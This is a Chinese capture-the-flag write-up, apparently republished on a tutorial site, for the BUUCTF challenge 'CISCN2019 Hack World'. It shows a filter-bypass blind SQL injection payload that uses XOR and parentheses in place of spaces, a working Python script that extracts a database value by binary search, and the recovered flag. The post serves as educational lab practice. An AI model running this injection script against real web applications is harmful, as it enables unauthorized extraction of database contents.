C/C++教程

BUUCTF - Web - [CISCN2019 华北赛区 Day2 Web1]Hack World

本文主要是介绍BUUCTF - Web - [CISCN2019 华北赛区 Day2 Web1]Hack World,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

[CISCN2019 华北赛区 Day2 Web1]Hack World

在这里插入图片描述

测试

id=1
在这里插入图片描述
id=2
在这里插入图片描述
fuzz 一下,空格/union/order by/updatexml/and/or等字符

分析

尝试盲注,题目给出表及字段,使用异或连接,用括号代替空格
0^(ascii(substr((select(flag)from(flag)),1,1))>1)
在这里插入图片描述

脚本

import requests

url="http://9fbcd2c9-29c1-45ee-8aa2-d17756ace4c0.node4.buuoj.cn:81/index.php"
target=""

## 本函数进行注入
#  @param i 数据的每个位置
#  @param j ASCII 码(二分法)
#  @return 返回 True 或 False
#
def payload(i,j):
    payload="0^" + "(ascii(substr((select(flag)from(flag)),{},1))>{})".format(i,j)
    post_data = {'id': payload}
    res=requests.post(url, data=post_data)
    # print(url+payload)

    # 用回显页面内元素判断
    if "girlfriend." in res.text:
        status=1        # True
    else:
        status=0        # False
    return status

## 本函数用于遍历数据的每一位
#
def exp():
    global target
    for i in range(1,10000):
        low=31
        heigh=127
        while low<=heigh:
            mid=(low+heigh)//2
            res=payload(i,mid)
            if res:
                low=mid+1
            else:
                heigh=mid-1
        result=int(low+heigh+1)//2
        if(result==127 or result==31):
            break
        target+=chr(result)
        print(target)

# 启动 exp
exp()

在这里插入图片描述
得到:flag{9dac589a-3b83-4cdc-b67f-21f89b8f7f5c}

这篇关于BUUCTF - Web - [CISCN2019 华北赛区 Day2 Web1]Hack World的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!